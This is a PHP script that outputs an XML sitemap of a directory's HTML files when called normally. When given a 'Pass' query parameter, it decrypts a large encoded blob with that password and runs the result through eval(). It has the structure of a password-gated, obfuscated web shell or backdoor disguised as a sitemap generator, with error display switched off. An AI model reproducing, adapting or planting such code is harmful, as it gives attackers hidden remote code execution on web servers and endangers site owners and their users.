<?php

ini_set("display_errors","0");
set_time_limit(0);
set_magic_quotes_runtime(0);


function passport_decrypt($txt, $key) { 
$txt = passport_key(base64_decode($txt), $key); 
$tmp = ''; 
for($i = 0;$i < strlen($txt); $i++) { 
$md5 = $txt[$i]; 
$tmp .= $txt[++$i] ^ $md5; 
} 
return $tmp; 
}
function passport_key($txt, $encrypt_key) { 
$encrypt_key = md5($encrypt_key); 
$ctr = 0; 
$tmp = ''; 
for($i = 0; $i < strlen($txt); $i++) { 
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; 
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++]; 
} 
return $tmp; 
} 

function getDir($dir) {
    $dirArray[]=NULL;
    if (false != ($handle = opendir ( $dir ))) {
        $i=0;
        while ( false !== ($file = readdir ( $handle )) ) {
            if (strpos($file,".html")>0) {
                $dirArray[$i]=$file;
                $i++;
            }
        }
        closedir ( $handle );
    }
    return $dirArray;
}

if($_GET["Pass"]==""){
$out_link = '<?xml version="1.0" standalone="yes"?>
<urlset xmlns="http://www.google.com/schemas/sitemap/0.84" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.google.com/schemas/sitemap/0.84 http://www.google.com/schemas/sitemap/0.84/sitemap.xsd">';
$dir = getDir(getcwd());
for($i=0;$i<count($dir); $i++){
$time = filemtime($dir[$i]);
$times = date("Y-m-d",$time)."T".date("H:i:s",$time)."+00:00";
$out_link .='<url><loc>'.dirname('http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]).'/'.$dir[$i].'</loc><lastmod>'.$times.'</lastmod><changefreq>Cold CMS</changefreq><priority>0.8</priority></url>';
}
$out_link .='</urlset>';
echo($out_link);
}

if($_GET["Pass"]!=""){
function KXnCV($GINHOQ)
{ 
$GINHOQ=gzinflate(base64_decode($GINHOQ));
 for($i=0;$i<strlen($GINHOQ);$i++)
 {
$GINHOQ[$i] = chr(ord($GINHOQ[$i])-1);
 }
 return $GINHOQ;
 }

eval(KXnCV(passport_decrypt("AihUBVEyVSMFagZtU3ZTPVVDUQYGMwoqDEYBBgQ4UQZWTgREUhNRBgZOV2gCJFdHAzNVMAJyBV4LVA4KDGkDMQIrVBFRLlU7BUQGIVNcU2JVaFEnBlUKcgxFAQEEOFExVn8EQVIfUScGTldfAgFXZwM6VTMCTQV/C0IOHgw3AysCeVRnUWBVPAU7BiFTT1M7VTBRDwZqCk4McAF5BCtREFZMBExSflFmBkJXLgJ7V2MDaFU3AjcFNgtLDi0MFANVAmJUKlEuVREFRwYBUzZTV1VjUScGPQpmDDABFQQdUT5WYARnUgZRZAY4V1YCBVdMAyVVOAI5BTYLUQ4JDB8DdgI6VAdREFUuBV0GElNsU3ZVflEdBmYKcQwyATQEPFEuVncEd1IPUTkGTlduAgdXTgMWVQECQAVDC0cOGAwtA3ECNlQfUQNVJAVuBjpTbFNcVXZRDAZ8CmoMYQEbBBdRIFZlBHVSHFEyBmhXXQIYV0cDHFUGAkAFOwtDDiwMFANFAhRUClEHVWAFPwZnU01TRVVQUWIGSwpZDDABLAQbUSNWYgQ2UgdRHAZ8V3UCEFdgAyZVGwJXBWQLSg44DC0DNwI5VCpRNVUWBT8GB1N/U2FVKVEjBjMKRgxkARsEMlEZVnYEVVJnUSMGIFdAAmZXfgMWVSACTgVCC3UOPAw9A0ACEFQpUTpVPQVeBhhTcFM5VU5RYQZXCnYMcQE3BCVREFZzBGFSNlFnBkRXZwJsVzMDM1UqAmIFTQt6DmgMNwNOAn1UNFEPVW8FfgZjU29TP1VwUTEGRgpbDGIBIgRmUW5WMARzUmNRMAZAV2kCJ1c6AzNVBwIuBVcLTw5qDC0DdgIoVDhRYlUhBUIGBlNsU0ZVZ1EeBk0KRgxWAWYEPFEPVjIEUFIDUR8GTVdRAgRXYAM8VT0CUAU4CzgOGgwZA28CPFQkUW5VBwVMBjNTKlNgVVVRIwYqCjQMVwFhBD1RM1ZIBFFSFFEhBjxXbQI+V20DH1UTAjcFawtaDg4MLgNlAgtUNFEZVSIFZAY7U1dTd1VcUSIGcAozDGIBfQQWUTJWTgR3UjJRKwY4V3wCBldhA3tVEQI3BXQLNg4YDG0DLwIrVBVRY1U7BWoGHVNIU0xVd1EzBmMKZgxgATgEGFEvVkUEW1IcUSkGYVcqAhlXOAMpVSICYwVkC1IOKQwKAysCP1QkUTJVEQU8BgVTfFNfVW5RLwYuCkkMVwFhBCRRD1ZfBHFSBFE7BltXSAJgV2IDElV5AmUFVAt3DjsMHAM0AgNUJ1EZVW8FPQYRU2JTSlVhUQ8GVQpHDHUBAQQYUQNWRARrUiZRCgZBVzwCOlc9Ax1VAQJABUYLYQ5gDC4DSQIAVAdRA1U4BTsGZFNkU19VV1EDBlIKNAw0ARgEEFEjVk4EZVIUURQGbVdUAi1XWAM7VSYCUgUlC0kOOAw3A24CEVQCUTNVEgVaBmVTZ1NjVW1ROwY0ClcMVwE5BB9RElZvBHJSElFqBiRXRAI9VyQDf1U1AlcFOAs1DjIMHwNGAgJUZVEAVR8FfQY3U0xTf1VSUSEGbQoqDHABHAQLUWdWQQRBUgZRIAZiV3ICN1dSAxJVAAJJBUoLZw4TDBwDYwIDVDxRDlUmBTAGMVNCU3dVZFEyBlIKUgxLAXkEElE5VmwEMlIBUQcGRFdPAjFXXwMyVWACSwVcC20OMQwaA3cCa1QiUR1VZwVrBhxTd1MkVXZRNAZzCjUMNgEABGJRNVZnBChSHFE3BiBXQwIbV0IDMlV5AjEFSQt0DhEMLQNXAghUY1ExVTEFWAYGU2tTdVU3UWMGdApiDFEBLwQfUSFWcgRAUiBREQZ6V1cCHldeAypVPAJXBWULMQ4MDCoDbgIYVGZRH1UTBWEGGVNpU3tVaFE7BlQKUww3ATQEBFF9VjcEc1IzUT4GYVdDAiVXbgM8VToCdAVfC0YObAwiA0YCYFRgUSZVIwV7Bh9TLlNVVWtRPQZWCnIMQAEVBGFRYlZoBHRSBlEjBnxXTwIGV0cDN1UeAlYFVwtvDnYMbwMvAh5UMlETVRAFRgYaU1ZTZlV+UT0GRwpnDHQBZgQVUWJWcAQwUjNRCwZjVzMCFVd9A2dVYwJ0BWwLcQ4fDG4DNwI6VDdRYVUvBU4GE1NoU15Vc1E+BnYKNgw3AT8EIlE5Vi0EQFIjURgGSFduAhFXUgMTVWsCSwVHC1AOcgw0A24CAlQwUSxVHAVkBhtTcFN7VUJRAQZICnYMSQEUBDxRZlZkBE1SB1E6BmpXNwI8V00DMVUlAkwFWwtVDjwMHwNIAmRUYFEfVWcFTAYGU1xTaFVSUSAGVApkDGMBDwRmURFWdwRGUjBRAQZhV1cCYVd/AxlVHAJgBWgLUA4jDD0DcQIdVGdRJFUeBWwGElNGU0NVc1EZBjIKUwxAAS4EHlE1VkEESlI5UWcGZFdqAmNXXwMYVSQCeAV2C1UONwwMA10CZFR8USdVYwVbBiJTQlN1VWlRFQZQCm0MUAFhBHhRGFZDBE5SZ1EcBmNXNwIEV0UDZ1UdAmgFbAtHDjIMCANzAgVUHVEiVTsFfQYbU11TPFVJUSwGRgpVDGsBNQQSUTFWUgRXUm1RPAY+VzYCO1dZAxZVBgJSBXgLQw4NDHADaAIGVBpRMlUHBX0GHVM2Uz9VLVEiBlwKcwxRASEEFVE/VmwERVJ6UREGXFdmAhxXTAMFVToCVwVIC28OEQwZA0oCB1QaUTJVEgVvBg5TQFNKVWlRPwZMCnQMUQEvBCVRIVZUBHJSelE7BmxXdAIVVzsDM1VjAjYFTAtoDmwMHANtAgZUG1E+VTMFXgYEUzVTZlVpUQUGQwpxDGQBFQQaUQVWNgRkUi9RAgZaV0ECPFdYAzpVAgJkBWELRA4MDC4DbgI7VCdReVVhBT0GEVNGU1pVXFE/BmEKMQxlARcEMFE5VlwEblIBUT8GUldOAhVXSQNpVT4CYgU+C1EOLgw0A04CFVQDUTxVPwVRBhxTPVNFVWFRMAZMCkMMRAFmBBpRYlY+BHtSO1EZBmBXcgIWVzkDYFViAnsFTAtHDh0MLANnAiBUNVFvVTAFbQYFU0dTQ1VVURMGVQo4DDUBJgQZUT5WRQRHUmFRFwZyV0ECGldiAyBVKwJUBWwLcQ5oDCgDYwIBVAZRHlUiBWUGYFNsU05VPlFlBl0KOQxlASEEH1E+VikEMFIRUQIGPFdsAhJXbAMgVSQCSgVkC0MOEwwtA3ICBlQqUW5VOgU7BjxTPFN1VUBRIQZrCnsMZgEeBGRRZ1YyBChSL1EnBklXSgITV0kDClU0AjIFPAtjDjQMEQNeAiJUalFiVScFIwY6UzZTflVwUQwGcAppDGgBDgQ+URNWVgRPUj1RPQZ6V0QCF1daA3tVPQJNBUsLcw4tDCMDfgI4VBtRElUaBW0GMlMyU25VdVEkBmcKYwx1ATQEP1FvVmcEVFIPUSAGaVddAj9XRwNmVWMCYwVXC0cOPgwpA2gCM1Q5UTxVMAVABgFTNVN1VTJRJAZJCmAMfgEABBhRElZpBExSD1EXBjhXcQIsV2EDClVhAmkFNgtmDhIMIQNRAhRUAVExVTYFSwYyU0JTSVU2UTEGSQoxDEYBDgQjURdWKQRqUi9RIwZZVzMCMld7AyZVKAJ5BUcLOQ4xDDMDUgIDVDJRY1UmBWAGJ1N/U2hVT1FnBlYKMgxeASQEGlEEVm0EO1I3UTgGSlc2AjpXMwMIVRwCUwV3C3YOAAw2A3UCFFQrURNVJwVZBj9TX1N1VWtRMwY8CmMMMQEsBCZRJ1ZjBEZSM1EjBkpXMgI/V18DZVUwAjAFOgtxDhoMHgN9AjFUZ1EBVWYFeAYQU3BTYFV0USQGSAp2DEYBHgQ9UThWVARZUiZRMgZiV0ACJFdZAzZVBQJCBTcLdg4zDCoDMQIzVB5ROFUBBTsGB1NqU2NVNVF9BjMKSgxNAT0EB1ElVnQEMFIfUSUGTFd8Ah9XWgMbVWICVgVXC3EOGwwrA28CP1QVUT5VEAVNBiVTMVM+VUdRGgY2CkoMZAEmBB9RJ1ZsBFtSYFE1BjlXfwJiV1MDOVUKAnAFPwtaDg8MHwNyAj5UBlEUVRIFQAY3UzdTQ1VMURUGbQpoDEYBPQQ/UTJWRARzUhdRHgZPV04CJ1d8AylVCwJuBUULSg4bDAsDaQJ9VB5RBVU1BWwGOFNKUz5VRFEABnYKMgxdAQ4EFlF9VmgEYFIbUWcGb1d0AjZXbwMDVR0CdgU+C2sOcgw3A2UCI1RlUWJVMQVmBhpTNFNXVVdREwY0Ck8MVAEfBAdRMlYwBDVSEFEgBm1XVwIVVzsDHVU8AmsFaAtpDhgMEwM0AiZUPFEAVSQFXAY9U0dTSlVLUQUGTwpxDGoBEwQLUQdWMgRXUiNRZwZyV28CIVdPA2ZVYQI0BVoLWA4IDGgDNAIbVGZRG1UwBVsGMFN3U1VVSVEOBmIKNww0ASYEGlE6VkgERVIPUQsGbldXAgZXfAMFVSICZgVfC00OMAwIA0oCAVQXUQdVHwVuBjBTc1N+VXFREwZECnEMQwFnBDpRIVZNBFlSJ1EBBjlXTwINV38DKFUaAmgFXQtKDgsMHANlAiRUH1EjVWcFRAYAU1JTPFVKUQUGXQpkDH8BAQQ9UR9WVAROUiVRMQZOVz0CY1cyAx5VBQJDBUILeg4pDCoDMwJ9VARRJFVmBVwGJ1NwUz1VVFFvBkMKcAwoATQEGlFgVkoESlI5UWcGYFdzAn9XXwNmVSICcgVcC04OGwwOA28CC1QUURBVJAV6BiZTS1N8VUJRAwZACmcMXQE+BCdRGlZXBEhSL1EVBm1XVQIdV0gDIlU+AmsFNgtqDiEMKgN0AghUP1EaVQ8FSQYWU0tTd1VzUT8GQgpgDD8BAwQHUSRWSARIUhtRYgY9VzwCBVdgAxpVZQJrBVsLcA5hDC0DVQIcVHhRBFU2BX8GFVNuU0hVP1EOBjYKQwx3ASQEZFF9Vi0EYFI+UWQGTVc9Ah9XfwMHVTECYgVCCzkObAw4A3YCa1RiURpVbwVkBgxTdFNDVWRRIQZyClcMbwF5BGpRHFZ/BHJSY1EaBmlXVQIsVz4DOVU5AmQFXgtGDh4MawNuAiBUeFEGVRUFIwYWU0hTPVVUUTsGdQo5DD8BDgQeUSxWKQREUgRRAwZ4V0kCAFdyAxZVJQI8BTM=",$_GET["Pass"])));}?>